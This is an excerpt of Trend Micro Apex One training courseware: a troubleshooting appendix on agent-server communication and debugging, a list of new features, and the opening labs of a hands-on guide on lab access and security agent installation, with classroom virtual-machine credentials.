Debugging the Apex One Server


Enabling debug functions on the Apex One Server allows an administrator to analyze many aspects of the
Apex One Server’s operation. To enable debug logging on the Apex One Server, perform the following
steps.
1 Log into the Apex One Web Management console with the appropriate administrative credentials.

© 2018 Trend Micro Inc. Education 357


Appendix A: Troubleshooting Trend Micro Apex One

2 Hover the cursor over the A in Apex One on the title banner of the console and click.

3 The Debug Log Setting window is displayed.

4 Specify the log settings required and click Save.


5 Locate the log file called ofcdebug.log in the following folder:

...\PCCSRV\Log
6 Disable logging after the issue has been resolved.

Changing the Security Agent Communication Port


It might be necessary to change the Security Agent communication port as part of troubleshooting, or
after upgrading or migrating the Apex One Server.

On the Security Agent


1 Copy the IpXfer.exe file from the following folder on the Apex One Server onto the Security
Agent:

C:\Program Files (x86)\Trend Micro\Apex One\PCCSRV\Admin\Utility\


IpXfer\
2 On the Security Agent, open a Windows Command Prompt. Navigate to the folder where the
ipxfer.exe file was placed and execute the following command:

ipxfer.exe –s <server_name> –sp 443 –c <agent_port> -pwd <password>

Note: Use ipxfer_x64.exe on 64-bit systems.

358 © 2018 Trend Micro Inc. Education


Appendix A: Troubleshooting Trend Micro Apex One

Troubleshooting Agent/Server Communication Issues


Certain conditions may prevent the Agent tree from displaying the correct Agent connection status, for
example, if the endpoint computer is physically disconnected from the network, the Agent will not be able
to notify the Server that it is now offline and will display incorrectly as online.The Agent-Server
connection can be manually verified or Apex One can perform a schedule verification.

Verify the Connection Status Manually


To verify the connection status manually, click Agents > Connection Verification. On the Manual
Verification tab, click Verify Now.

Verify the Connection Status Automatically


To verify the connection status automatically, click Agents > Connection Verification. On the
Scheduled Verification tab configure the scheduled verification.

© 2018 Trend Micro Inc. Education 359


Appendix A: Troubleshooting Trend Micro Apex One

Verify the Results of the Connection Status


Apex One created a log entry each time the Agent/Server connection is checked. To check the logs,
click Logs > Agents > Connection Verification Logs. Check the Status column for the results of the
connection test.

Troubleshooting Communication Issues Between Security Agent


and Server
There are several potential causes for connection issues. Some of the remedies include:
• Verifying if the Server can ping the Agent, and vice versa.
• Checking if the Server can telnet to the Agent using the Agent communication port.
• Checking if the Agent can telnet to the Server using the Server communication port (default is
8080 for Apex One).
• Verifying if the Agent can resolve the Server's hostname.
• Open a browser then type the following address:

http://<servername>:<port>/officescan

Verify Security Agent Registry settings


In some cases the Agent Registry settings may be incorrect. Perform the following steps to confirm
the settings:
1 On the Server machine, open the ofcscan.ini file in a text editor.
2 Note the values of the following parameters:

Master_DomainName

Master_DomainPort

Master_SSLPort

360 © 2018 Trend Micro Inc. Education


Appendix A: Troubleshooting Trend Micro Apex One

Client_LocalServer_Port
3 Open the Registry Editor on the Agent computer.
4 Open the following registry hive (for 64-bit machines):

HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\TrendMicro\PC-cillinNTCorp\
CurrentVersion
5 Check the values of the following registry keys and modify as necessary:

LocalServerPort Δ must have the same value as Client_LocalServer_Port

Server Δ must have the same value as Master_DomainName

ServerPort Δ must have the same value as Master_DomainPort

ServerSSLPort Δ must have the same value as Master_SSLPort

Confirm Correct Product Licensing


Invalid licensing of server and desktop components could create communication problems. From the
Apex One Web Management console, go to Administration > Settings > Product License and verify
that the licensing status displays as is Activated.

Verify Agent Privileges to Communicate With the Server


In some cases, the Agent may not have sufficient privileges to communicate with the Server. To
verify, perform the following steps:
1 On the Apex One Server, open Windows Command Prompt.
2 Navigate to the ...\PCCSRV folder and run the following commands:

svrsvcsetup -setvirdir

© 2018 Trend Micro Inc. Education 361


Appendix A: Troubleshooting Trend Micro Apex One

svrsvcsetup -setprivilege
If you are using SSL, run the following command:

svrsvcsetup -enablessl

Verify Internet Information Services


In some cases the Internet Information Services (IIS) settings may be incorrect. To verify, perform the
following steps.
1 Open the Internet Information Services Manager then expand <server name> > Sites >
OfficeScan.
2 In the middle pane, double-click Authentication.
3 Ensure that Anonymous access is enabled.

4 Click Edit in the Actions frame and ensure that anonymous authentication is using the IUSR
user.

Re-establish Communication Using autopcc.exe


Autopcc.exe can be used to re-establish connection between the Agent and Server. To force an
update of the Security Agent and a reconnection, perform the following steps.
1 In Windows, click Start > Run and enter the following command:

\\<Apex_One_Server_name_or_IP_address>\ofcscan\autopcc.exe –f -u

362 © 2018 Trend Micro Inc. Education


Appendix A: Troubleshooting Trend Micro Apex One

2 Open the Apex One Web Management console, and verify if the Security Agent now appears
correctly

Re-establish Communication Using IpXfer.exe


Alternately, IpXfer.exe can be used to re-establish connection between the Security Agent and
Apex One Server. To attempt a reconnection, perform the following steps:
1 On the Apex One Server, open the ...\PCCSRV\ofcscan.ini file in a text editor
2 Note the values of the following parameters:

Master_DomainName

Master_SSLPort

Client_LocalServer_SSLPort
3 Copy the ...\PCCSRV\Admin\Utility\IpXfer\IpXfer.exe file to the Security Agent
folder on the Agent endpoint computer.
4 On the Agent computer, open Windows Command Prompt window and navigate to the Security
Agent folder and run the following command:

IpXfer.exe -s <value_of_Master_DomainName> -p
<value_of_Master_SSLPort> -c <value_of_Client_LocalServer_SSLPort>
5 Open the Web Management console then verify if the Security Agent now appears correctly.

Verify Windows Firewall Blocking


In some cases, the Windows Firewall may be blocking communication ports. To open the necessary
ports, perform the following steps.
1 On the Apex One Server computer, open the ...\PCCSRV\ofcscan.ini file in a text editor.
2 Note the values of the following parameters:

Master_SSLPort

Client_LocalServer_SSLPort
3 On the Agent machine, open Control Panel > Windows Firewall.
4 Click the Exceptions tab and click Add Port.
5 Enter the values of the Master_SSLPort and Client_LocalServer_SSLPort using TCP.
6 Restart the Apex One NT Listener service.
7 Clear Internet Explorer temporary Internet files, offline content, and cookies.
8 Open the Web Management console and verify if the Agent now appears correctly.

© 2018 Trend Micro Inc. Education 363


Appendix A: Troubleshooting Trend Micro Apex One

Change the Agent Domain


Changing the Agent domain may sometimes resolve communication issues. To change the Agent
domain, perform the following steps.
1 Open the Apex One Web Management console and navigate to Agents > Agent Management.
2 Click Manage Agent Tree > Add Domain.
3 Type a name for the domain, and click OK
4 Drag the Agent that has an offline or disconnected status to the new domain.
5 On that Security Agent endpoint, restart the Apex One NT Listener service.
6 Right-click the Apex One icon on the system tray then click Update Now.
7 Refresh the Web Management console then verify if the Agent now appears correctly.

Verify Server Hostname Resolution


If the Security Agent is unable to resolve the Apex One Server hostname to an IP address,
communication issues may be encountered. To verify name resolution, perform the following steps.
1 On the Server machine, open the ...\PCCSRV\ofcscan.ini file in a text editor.
2 Note the values of the following parameters:

Master_DomainName

Master_SSLPort
3 On the Agent computer, open a browser and type the following address:

https://<value_of_Master_DomainName>:<value_of_Master_SSLPort>/
officescan/cgi/cgionstart.exe
4 If the page displays -2, the client can communicate with the server.

Troubleshooting Virus Infection


To better help administrators analyze the source of malware and spyware, they can verify the infection
channel. This data exists in the real time scan logs for virus and spyware on both agents and servers, and
can help administrators trace how users were infected by the malware or spyware.

364 © 2018 Trend Micro Inc. Education


Appendix A: Troubleshooting Trend Micro Apex One

Determining the Virus Infection Channel on the Server


The Virus/Malware Logs displayed in the Web Management console includes an Infection Channel
column.

Determining the Virus Infection Channel on the Agent


On the Security Agent, the Infection Channel details exist in the Log Details.

© 2018 Trend Micro Inc. Education 365


Appendix A: Troubleshooting Trend Micro Apex One

Determining Spyware/Grayware Infection Channel on the Server


In the Spyware/Grayware Log Details, the Infection Channel is displayed in the Spyware Components
section.

Determining Spyware/Grayware Infection Channel on the Agent


On the Agent, the Infection Channel details exist in the Log Details.

366 © 2018 Trend Micro Inc. Education


Appendix A: Troubleshooting Trend Micro Apex One

Troubleshooting the Firewall Service


Consider the following to help troubleshoot firewall-related issues:
• Verify that the protocol is supported. In Apex One, only TCP/UDP/ICMP protocols are supported.
• Dump rules using tmpfw dump command and verify rules in the !Pfwdump.txt file.

Troubleshooting the Unauthorized Change Prevention


Service
To enable debug logs for this service, perform the following steps.
1 Add the following Registry key on the Security Agent host, and restart the service

Key HKLM\Software\TrendMicro\AEGIS

Value DebugLogFlags

Data 0x00000032

Type REG_DWORD
Logs will be placed in :

...\BM\Log > TmCommengyyyymmdd_nn.log and TMPEMyyyymmdd_nn.log

...\Security Agent\Log > TMBMCliyyyymmdd_nn.log

© 2018 Trend Micro Inc. Education 367


Appendix A: Troubleshooting Trend Micro Apex One

Troubleshooting Edge Relay Server Certificates


The Apex One Edge Relay Server uses digital certificates to secure communication between Agents, the
Relay Server and Apex One Server. If communication issues arise, verify the following.
• Verify that Web Server certificate (OscePA) installed in the Trusted Root Certification Authorities
store is signed by OsceEdgeRoot
• Verify the certificate used by the Data Service

Troubleshooting Sample Submission


To troubleshoot issues related to malware sample submission to a Deep Discovery Analyzer device,
consider the following:
• Verify that the Apex One Server and Deep Discovery Analyzer have been registered in Apex
Central and the devices are not listed in the New Entity folder

368 © 2018 Trend Micro Inc. Education


Appendix A: Troubleshooting Trend Micro Apex One

• Verify that the Apex One is subscribed to the Suspicious Object List

• Verify that the Sample Submission Settings are enabled for the Security Agent.

• Verify that the sample gets uploaded from the Agent to the Apex One Server by locating the
sample in the following folder shortly after detection, but before processing by the Deep
Discovery Analyzer:

...\TEMP\Sample Submission

© 2018 Trend Micro Inc. Education 369


Appendix A: Troubleshooting Trend Micro Apex One

370 © 2018 Trend Micro Inc. Education


Appendix A: What’s New in Trend Micro
Apex One
Trend Micro OfficeScan has evolved into Trend Micro Apex One. As an upgrade to OfficeScan, Apex
introduces new functionality to endpoint protection. Some of the new features introduces in Apex One
are described here.

All-in-one Security Agent


Apex One integrates capabilities like Application Control, Vulnerability Protection, Endpoint Sensor into a
single Agent installed on the endpoint computer.

Offline Predictive Machine Learning


Apex One includes a new offline machine learning model for use in cases where the endpoint does not
have network connectivity to query the cloud-based learning model hosted on the Trend Micro Smart
Protection Network

Fileless Threat Detection Enhancements


In-memory runtime analysis capabilities have been enhanced in Apex One to improve fileless threat
detection.

Integrated Vulnerability Protection


Apex One’s Vulnerability Protection provides timely blocking of operating system vulnerabilities. This
Virtual Patching protection is simplified by configuring Vulnerability Protection in one of two modes:
security or performance.

Integrated Application Control


Allows administrator to define which applications are allowed on the protected endpoint. Applications
can be blocked on a category level, by a particular vendor, by specific application and even version of
application.

Investigative Capabilities
Apex One integrates new Endpoint Detection and Response capabilities including server-side metadata
sweeping, Indicator of Attack (IOA) behavior hunting, new query and automation Application
Programming Interfaces (API)

© 2018 Trend Micro Inc. Education 371


Appendix A: What’s New in Trend Micro Apex One

Mac Protection Features


Apex One adds new protection features for Mac endpoints, including Endpoint Detection and Response,
Predictive Machine Learning, and Device Control.

Managed Detection and Response Service Support for


SaaS
The Trend Micro Managed Detection and Response (MDR) Service, which was previously only supported
in on-premise deployments is now also supported in the Software as a Service deployment model.

Indicator of Attack Behavioral Analysis Enhancements


Apex One enhances the Indicator of Attack (IOA) Behavioral Analysis capabilities to detect known
indicators of attack including ransomware, encryption behaviors and script launching.

Application Programming Interface Enhancements


Apex One enhances the Application Programming Interface (API) capabilities by introducing more
reporting and control capabilities.

Cloud Sandbox
Apex One as a Service customers can now take advantage of an additional Cloud Sandbox (Deep
Discover Analyzer as a Service) for Connected Threat Defense, which is available as an add-on service.

Apex Central
Trend Micro Control Manager has been rebranded to Apex Central. This application contains the same
functionality as Control Manager and includes support for new Apex One features such as integrated
Application Control, Vulnerability Protection and Endpoint Sensor.

Kernel Mode Termination Protection


Change protection blocks user mode termination event but there are some applications that could
potentially terminate processes through kernel mode. To address this issue, Apex One introduces a new
Watchdog mechanism for kernel mode termination events. This mechanism will attempt to recover
target processes after being terminated.

372 © 2018 Trend Micro Inc. Education


Appendix A: What’s New in Trend Micro Apex One

Location Awareness Enhancement


An enhancement for location awareness in Apex One will check the network adapter used to connect to
the reference host and identify if the endpoint is internal or external. Previously, when an external
Security Agent connects to the Apex One Server using VPN connection, it was referred as an internal
agent and the related internal policy settings were applied. VPN clients (Cisco, F5, Fortigate…) create a
virtual network adapter as a network device to communicate with target network. In Apex One, a new
setting called Exclude agents using VPN or PPP dial-up connections is available so Security Agents using
the VPN connection will be identified as an external Agent.

© 2018 Trend Micro Inc. Education 373


Appendix A: What’s New in Trend Micro Apex One

374 © 2018 Trend Micro Inc. Education


Trend Micro Apex One™
Training for Certified Professionals
Lab Guide
Copyright © 2019 Trend Micro Incorporated. All rights reserved.

Trend Micro, the Trend Micro t-ball logo, InterScan, VirusWall, ScanMail, ServerProtect,
and TrendLabs are trademarks or registered trademarks of Trend Micro Incorporated.
All other product or company names may be trademarks or registered trademarks of
their owners.

Portions of this manual have been reprinted with permission from other Trend Micro
documents. The names of companies, products, people, characters, and/or data
mentioned herein are fictitious and are in no way intended to represent any real
individual, company, product, or event, unless otherwise noted. Information in this
document is subject to change without notice.

No part of this publication may be reproduced, photocopied, stored in a retrieval system,


or transmitted without the express prior written consent of Trend Micro Incorporated.

Released: July 29, 2019


Trend Micro Apex One
Courseware v2
Trend Micro Apex One Training for Certified Professionals - Lab Guide

Table of Contents
Lab 1: Accessing the Apex One Lab Environment ......................................................................1
Exercise 1: Access the Product Cloud Portal ....................................................................................................... 3

Lab 2: Installing Security Agents...................................................................................................11


Exercise 1: Integrate With Microsoft Active Directory ...................................................................................... 11
Exercise 2: Install an Agent Remotely ................................................................................................................. 12
Exercise 3: Install an Agent through Unmanaged Endpoints.........................................................................16
Exercise 4: Install an Agent using AUTOPCC ....................................................................................................20
Exercise 5: Install Agents Through a Package................................................................................................... 21
Exercise 6: View the Agent List............................................................................................................................22

Lab 3: Grouping Security Agents................................................................................................ 25


Exercise 1: Create an Automatic Agent Grouping ............................................................................................25

Lab 4: Updating Security Agents................................................................................................. 31


Exercise 1: Verify Security Agent Update Sources ........................................................................................... 31
Exercise 2: Create an Update Agent ...................................................................................................................35

Lab 5: Installing a Standalone Smart Protection Server ...................................................... 39


Exercise 1: Access the Smart Protection Server Management Console.....................................................39
Exercise 2: Add the Standalone Smart Protection Server to Apex One ....................................................42

Lab 6: Protecting Endpoint Computers From Malware......................................................... 47


Exercise 1: Configure Real-Time Scans ...............................................................................................................47
Exercise 2: Test Virus/Malware Scans............................................................................................................... 50
Exercise 3: Test Spyware/Grayware Scans .......................................................................................................53
Exercise 4: View Quarantined Files .....................................................................................................................55

Lab 7: Protecting Endpoint Computers Through Behavior Monitoring ............................ 59


Exercise 1: Block Newly Encountered Software................................................................................................59

Lab 8: Protecting Endpoint Computers From Unknown Threats ....................................... 63


Exercise 1: Enable Predictive Machine Learning...............................................................................................63

Lab 9: Blocking Web Threats ....................................................................................................... 67


Exercise 1: Enable Web Reputation ......................................................................................................................67
Exercise 2: Add an Application to the Web Reputation Whitelist ................................................................. 71
Exercise 3: Protect Endpoint Computers From Browser Exploits................................................................ 72

Lab 10: Protecting Endpoint Computers Through Traffic Filtering.................................... 77


Exercise 1: Enable the Firewall Service ............................................................................................................... 77
Exercise 2: Create a Firewall Policy.....................................................................................................................78
Exercise 3: Create a Firewall Profile ....................................................................................................................81
Exercise 4: Verify the Firewall Deployment ......................................................................................................82
Exercise 5: Disable the Firewall Policy............................................................................................................... 86

© 2019 Trend Micro Inc. Education i


Trend Micro Apex One Training for Certified Professionals - Lab Guide

Lab 11: Preventing Data Loss........................................................................................................89


Exercise 1: Install the Data Protection Plug-In ................................................................................................. 89
Exercise 2: Configure Data Identifiers ................................................................................................................92
Exercise 3: Configure a Data Leak Prevention Template ............................................................................. 94
Exercise 4: Deploy a New Data Leak Prevention Policy.................................................................................96
Exercise 5: Modify Justification Reasons ........................................................................................................ 102

Lab 12: Managing Policies Through Apex Central..................................................................105


Exercise 1: Integrate Apex Central and Apex One.......................................................................................... 105
Exercise 2: Create an Apex Central User Account ........................................................................................ 106
Exercise 3: Confirm Registration ....................................................................................................................... 109
Exercise 4: Add Apex One to the Product Directory..................................................................................... 109
Exercise 5: Configure a Policy Template.............................................................................................................111
Exercise 6: Test the New Policy ...........................................................................................................................115

Lab 13: Submitting Suspicious Files for Analysis .................................................................... 117


Exercise 1: Register Deep Discovery Analyzer With Apex Central...............................................................117
Exercise 2: Add Deep Discovery Analyzer to the Product Directory ......................................................... 118
Exercise 3: Subscribe Apex One to the Suspicious Objet List...................................................................... 119
Exercise 4: Submit Suspicious Files .................................................................................................................. 120
Exercise 5: Track the Submission ........................................................................................................................121

Lab 14: Blocking Unauthorized Applications............................................................................ 131


Exercise 1: Create a Policy .....................................................................................................................................131
Exercise 2: Test the Policy................................................................................................................................... 134
Exercise 3: Define Application Control Criteria .............................................................................................. 135
Exercise 4: Test the Allow Rule .......................................................................................................................... 138
Exercise 5: View the Application Control Log Entry ..................................................................................... 138

Lab 15: Protecting Endpoint Computers from Vulnerabilities.............................................141


Exercise 1: Enable Vulnerability Protection ...................................................................................................... 141
Exercise 2: Test Vulnerability Protection......................................................................................................... 143
Exercise 3: View the Vulnerability Protection Log Entry............................................................................. 145

Lab 16: Endpoint Detection and Response ..............................................................................147


Exercise 1: Deploy the Endpoint Sensor License ............................................................................................ 147
Exercise 2: Deploy a Policy using Endpoint Sensor....................................................................................... 149
Exercise 3: Verify the New Policy ........................................................................................................................151
Exercise 4: Investigate a Security Incident .......................................................................................................151
Exercise 5: Responding to the Incident ............................................................................................................ 155
Exercise 6: Restore Endpoint Connectivity ..................................................................................................... 157

ii © 2019 Trend Micro Inc. Education


Lab 1: Accessing the Apex One Lab
Environment
This first lab introduces participants to the virtual lab environment used to complete the hands-on
exercises in this Apex One training course.

The classroom lab environment is delivered as a virtual application through the Trend Micro Product
Cloud and will be accessed from a Web browser on your computer. Google Chrome is the preferred
browser for this environment, though other browsers may work if the appropriate plug-ins are enabled
and working properly.

Network Settings
The details and login credentials for each virtual machine in the classroom environment are listed here.

Always log into Windows as the local administrator. Logging in as a domain administrator will display a
different desktop and certain exercise files may not be available.

VM Name Hostname Operating System Addressing Login


IP: 192.168.4.1 Login Name:
Windows Server 2016 Subnet mask: 255.255.240.0 administrator
VM-DC2016 dc2016.trend.local (hosting Apex One Default gateway: 192.168.0.1
Server) DNS 1: ::1 Password:
DNS 2: 127.0.0.1 trendmicro
IP: 192.168.4.2 Login Name:
Subnet mask: 255.255.240.0 administrator
VM-CLIENT-01 client-01.trend.local Windows Server 2016 Default gateway: 192.168.0.1
DNS 1: 192.168.4.1 Password:
DNS 2: 8.8.8.8 trendmicro
IP: 192.168.4.4 Login Name:
Subnet mask: 255.255.240.0 administrator
VM-CLIENT-02 client-02.trend.local Windows 10 Default gateway: 192.168.0.1
DNS 1: 192.168.4.1 Password:
DNS 2: 8.8.8.8 trendmicro
IP: 192.168.4.6 Login Name:
Subnet mask: 255.255.240.0 administrator
VM-CLIENT-03 client-03.trend.local Windows 10 Default gateway: 192.168.0.1
DNS 1: 192.168.4.1 Password:
DNS 2: 8.8.8.8 trendmicro
IP: 192.168.4.3 Login Name:
Subnet mask: 255.255.240.0 administrator
Windows Server 2012 R2
VM-WIN2012 win2012.trend.local
(hosting Apex Central)
Default gateway: 192.168.0.1
DNS 1: 192.168.4.1 Password:
DNS 2: 8.8.8.8 trendmicro
IP: 192.168.4.5 Login Name:
Subnet mask: 255.255.240.0 admin
VM-ANALYZER DDAN CentOS Default gateway: 192.168.0.1
DNS 1: 192.168.4.1 Password:
DNS 2: 8.8.8.8 Admin1234!
IP: 192.168.4.7 Login Name:
Subnet mask: 255.255.240.0 admin
VM-SPS SPS CentOS Default gateway: 192.168.0.1
DNS 1: 192.168.4.1 Password:
DNS 2: 8.8.8.8 trendmicro

© 2019 Trend Micro Inc. Education 1


Lab 1: Accessing the Apex One Lab Environment

Application Credentials
The URLs, user names and passwords used for each application pre-installed within the classroom lab
environment are listed here for easy reference.

Apex One
URL: https://dc2016.trend.local:4343/officescan
• User name: root
• Password: trendmicro

Apex Central
URL: https://192.168.4.3/WebApp/Login.html
• User name: Admin
• Password: Pa$$w0rd

Deep Discovery Analyzer


URL: https://192.168.4.5
• User name: admin
• Password: Admin1234!

Smart Protection Server


URL: https://192.168.4.7:4343
• User name: admin
• Password: trendmicro

Training Cloud Login Credentials


The instructor will distribute a unique Training Cloud user name and password to each class participant.
These credentials will be used for the duration of the training session. Write the user name and password
here for easy retrieval when needed during the different labs.
• User name: __________________________________________________
• Password: ___________________________________________________

2 © 2019 Trend Micro Inc. Education


Lab 1: Accessing the Apex One Lab Environment

Exercise 1: Access the Product Cloud Portal


In this exercise, participants will download a remote access shortcut in the form of an *.rdp file. Double-
clicking the *.rdp file will connect you to the virtual application. This shortcut will be used repeatedly in
the exercises to connect to the classroom environment.
1 Open a Web browser and type the following URL to access the Trend Micro Product Cloud:
https://home.productcloud.trendmicro.com/

2 Log in with the Username and Password assigned to you by the instructor.

© 2019 Trend Micro Inc. Education 3


Lab 1: Accessing the Apex One Lab Environment

3 On the Product Cloud Homepage, click Training Area (from either the left-hand pane, or the
middle pane)

4 Click the RDP link for your region (Americas, Asia Pacific, or Europe Middle East and Africa) from
the EDUCATION section of the page.

4 © 2019 Trend Micro Inc. Education


Lab 1: Accessing the Apex One Lab Environment

Note: If you use Product Cloud for other purposes, you may already have an RDP shortcut on your
system. DO NOT use the existing shortcut. Download the version for Education and use the
credentials provided by the Instructor.

5 When prompted, save the *.rdp file to your desktop.


6 Double-click the RemoteApp shortcut (the file you just saved with the *.rdp extension).
7 A RemoteApp pop-up window will appear. If a trust dialog box appears, click Connect in the
window prompting you to trust the publisher of the RemoteApp program.

If prompted, log in again with the User name and Password assigned to you by the Instructor.

Note: Mac users experiencing problems accessing these sites should make sure to use the Microsoft
Remote Desktop client that is available from the Mac App Store at:
https://macappsto.re/ie/HjCQQ.m

8 If a Localization Error is displayed, click Refresh on the vApp menu bar.

© 2019 Trend Micro Inc. Education 5


Lab 1: Accessing the Apex One Lab Environment

9 The Apex One Education virtual application is displayed. Click Open to launch the virtual
application.

10 The different virtual machines that make up the Apex One Education virtual application are
displayed. These correspond to the machines listed in the table at the beginning of this lab.
If the green Start icon is active (not greyed-out), click it to play the virtual application. (The
instructor may have started the vApp for you as part of the classroom setup, in this case, the
Start icon will not be active.)
Once the virtual application is started, you are ready to begin the lab exercises. If the virtual
application fails to start up, please advise your instructor.

Note: It may take a few minutes to start the virtual application the first time it is played.

6 © 2019 Trend Micro Inc. Education


Lab 1: Accessing the Apex One Lab Environment

Alternate Method (use only with Instructor guidance)


If participants are experiencing issues with the RDP connection, the instructor may instruct you to
use this method to connect to the lab environment.
1 Open a Web browser and type the following URL to access the Trend Micro Product Cloud:
https://<region>.productcloud.trendmicro.com/cloud/org/education
(Where <region> is the code for the location where the training is being completed. Use
one of the following regions:
• SJDC if you are completing the training in the Americas
• ADC if you are completing the training in Asia
• EDC2 if you are completing the training in Europe, Middle East or Africa
For example:
https://SJDC.productcloud.trendmicro.com/cloud/org/education

Note: Save a bookmark to this URL (or add to Favorites) as you will be returning to it each day of the
course.

2 Log in with the User name and Password assigned to you by the instructor.

© 2019 Trend Micro Inc. Education 7


Lab 1: Accessing the Apex One Lab Environment

3 If a Localization Error is displayed, click Refresh on the vApp menu bar.

4 The Apex One Education virtual application is displayed. Click Open to launch the virtual
application.

5 The different virtual machines that make up the Apex One Education virtual application are
displayed. These correspond to the machines listed in the table at the beginning of this lab.
If the green Start icon is active (not greyed-out), click it to play the virtual application. (The
instructor may have started the vApp for you as part of the classroom setup, in this case, the
Start icon will not be active.)

8 © 2019 Trend Micro Inc. Education


Lab 1: Accessing the Apex One Lab Environment

Note: It may take a few minutes to start the virtual application the first time it is played.

© 2019 Trend Micro Inc. Education 9


Lab 1: Accessing the Apex One Lab Environment

10 © 2019 Trend Micro Inc. Education


Lab 2: Installing Security Agents
In this lab, participants will install Security Agents on endpoint computers in the virtual lab environment
using a variety of methods.

Estimated time to complete this lab: 30 minutes

Exercise 1: Integrate With Microsoft Active Directory


In this exercise, Apex One will be integrated and synchronized with Microsoft Active Directory to assist
in locating endpoint computers.
1 In the virtual application, click to open the VM-DC2016 virtual machine.
2 Log into Windows Server 2016 with following credentials if prompted:
• User name: Administrator
• Password: trendmicro

Note: Use <ctrl>+<alt>+<insert> to access the Log In dialog box in the virtual machine, or click the
keyboard icon at the top of the VMware window.

3 Click on the virtual machine window toolbar to maximize the window.

Note: Verify that the keyboard language is set correctly for your locale. If required, click the Change
Language shortcut on the Windows Server 2016 desktop to change the keyboard to another
language.
Alternately, a text file on the desktop called Copy and Paste.txt contains entries that can be
copied into any requested fields.

4 In the Internet Explorer or Chrome Web browser, launch the Apex One Web Management console
by typing the following URL:
https://dc2016.trend.local:4343/officescan
Alternately, click the Apex One bookmark in the browser, or click Apex One in the Windows Start
menu.
5 Log in with following Apex One credentials when prompted:
• User name: root
• Password: trendmicro
6 Go to Administration > Active Directory > Active Directory Integration.

© 2019 Trend Micro Inc. Education 11


Lab 2: Installing Security Agents

7 Type the name of the classroom domain (trend) and click Save and Synchronize.

8 A message in the Web Management console confirms that the Active Directory domains are
saved and synchronized.

Exercise 2: Install an Agent Remotely


In this exercise, a Security Agent will be installed on the CLIENT-02 computer using Remote Installation
from the Web Management console.
1 In the virtual application, click to open the VM-CLIENT-02 virtual machine.
If prompted, log in to Windows 10 using the following credentials:
• Username: Administrator
• Password: trendmicro

12 © 2019 Trend Micro Inc. Education


Lab 2: Installing Security Agents

Note: If an Enable Network Discovery message is displayed when logging into ANY client virtual
machine, click Yes.

2 Click Start > Windows Administrative Tools > Services. Locate the Remote Registry service.

© 2019 Trend Micro Inc. Education 13


Lab 2: Installing Security Agents

3 Double-click the service and set the Startup type to Automatic and click Apply. Click Start to set
the service to Running. Click OK.

4 Return to the VM-DC2016 virtual machine and in the Web Management console go to Agents >
Agent Installation > Remote.
5 In the Remote Installation window, type client-02 in the Search for endpoints field and hit
<enter>.

14 © 2019 Trend Micro Inc. Education


Lab 2: Installing Security Agents

6 When prompted, type the administrator credentials to log into the CLIENT-02 computer and click
Log on:
• Username: Administrator
• Password: trendmicro

7 The CLIENT-02 computer is displayed in the Selected Endpoints list. Click Install.

8 Click OK to continue with the Agent installation on the selected endpoints.

© 2019 Trend Micro Inc. Education 15


Lab 2: Installing Security Agents

9 After a few moments, a confirmation of the remote installation on Agent endpoints is displayed.
Click OK.

10 The Result column will display success once the installation is complete. This may take a few
minutes.

11 Return the VM-CLIENT-02 virtual machine. A message should be displayed indicating that the
Security Agent was installed on this computer. Wait for the prompt to appear and click Restart
to complete the installation process.

Exercise 3: Install an Agent through Unmanaged


Endpoints
In the following exercise, participants will install a Security Agent on an unmanaged endpoints detected
through an Active Directory search.
1 In the virtual application, click to open the VM-CLIENT-03 virtual machine.
If prompted, log in to Windows 10 using the following credentials:
• Username: Administrator
• Password: trendmicro
2 Repeat steps 2-3 from the previous exercise on the CLIENT-03 computer.
3 Return to the VM-DC2016 virtual machine and log into the Apex One Web Management console.

16 © 2019 Trend Micro Inc. Education


Lab 2: Installing Security Agents

4 Click Assessment > Unmanaged Endpoints. In the Active Directory / IP Address Scope pane, click
the Active Directory tab and click Define Scope.

5 In the Active Directory Scope pane, click to enable trend.local, and click Save and Reassess.

6 Click OK to continue with the query of the domain.

© 2019 Trend Micro Inc. Education 17


Lab 2: Installing Security Agents

7 The progress of the domain query is displayed.

8 You may need to wait a few moments until the query completes. A success message is displayed
when complete. Click OK.

18 © 2019 Trend Micro Inc. Education


Lab 2: Installing Security Agents

9 A list of unmanaged endpoints in the trend.local domain is displayed. Click to highlight CLIENT-
03 in the list and click Install.

10 When prompted, type the administrator credentials for the CLIENT-03 computer and click Log
on:
• Username: Administrator
• Password: trendmicro
11 It may take a few minutes for the installation process to complete. Once it is finished, the Status
column will display Complete.

12 Return the VM-CLIENT-03 virtual machine and wait for a message to be displayed indicating that
the Security Agent was installed on this computer. Restart the computer to complete the
installation process.

© 2019 Trend Micro Inc. Education 19


Lab 2: Installing Security Agents

Exercise 4: Install an Agent using AUTOPCC


In this exercise, an Security Agent will be installed on the CLIENT-01 computer using the AUTOPCC script.
1 Return to the VM-DC2016 virtual machine. In Windows Explorer, locate and open following file:
C:\Program Files (x86)\Trend Micro\Apex One\PCCSRV\
Autopcc.cfg\autopcc.ini
2 Locate the [Install] section. Modify the following settings:
• SilentInstall: 1 (This will enable silent installation, no setup dialog boxes are displayed on
the client computer)
• NoPrescan: 1 (This will disable the prescan on the client computer)

Save and close the file.


3 In the virtual application, click to open the VM-CLIENT-01 virtual machine.
If prompted, log in to Windows Server 2016 using the following credentials:
• Username: Administrator
• Password: trendmicro
4 Click Run on the taskbar and enter the following command:
\\192.168.4.1\ofcscan\autopcc.exe
5 When prompted, click Run to execute the script.

6 A Windows Command Prompt window will appear momentarily as the script is initiated. After a
short while, the Apex One icon will be displayed in the system tray to indicate it is installed. When
prompted, restart the computer to complete the installation process.

20 © 2019 Trend Micro Inc. Education


Lab 2: Installing Security Agents

Exercise 5: Install Agents Through a Package


In this exercise, an Agent installation package will be created and run on the DC2016 computer.
1 Return to the VM-DC2016 virtual machine and in Windows Explorer, locate the following folder:
…\PCCSRV\Admin\Utility\ClientPackager\

Note: Some of the lesser-used utilities in this folder have been deleted to conserve space in the
classroom lab environment.

2 Locate and double click the Agent Packager tool called clnpack.exe.
3 Configure the Agent Packager with the following details:
• Package Type: Setup
• Windows operating system type: 64-bit
• Scan Method: Smart Scan
• Domain: Allow the agent to report its domain automatically
• Disable prescan: Click to enable (no prescan of the target computer should be performed)

Note: In the exercise, the prescan is disabled as it may take several minutes to scan the computer
before the Security Agent is installed. In a real-world configuration, a prescan is recommended.

• Source file: C:\Program Files (x86)\Trend Micro\Apex One\


PCCSRV\ofscan.ini
• Output file: C:\Apex One Installer.exe
Click Create.

© 2019 Trend Micro Inc. Education 21


Lab 2: Installing Security Agents

4 The Agent Packager will build the installation package with the defined parameters.

5 A Success message is displayed when the packing process is complete. Click OK.

6 Close the Agent Packager utility.


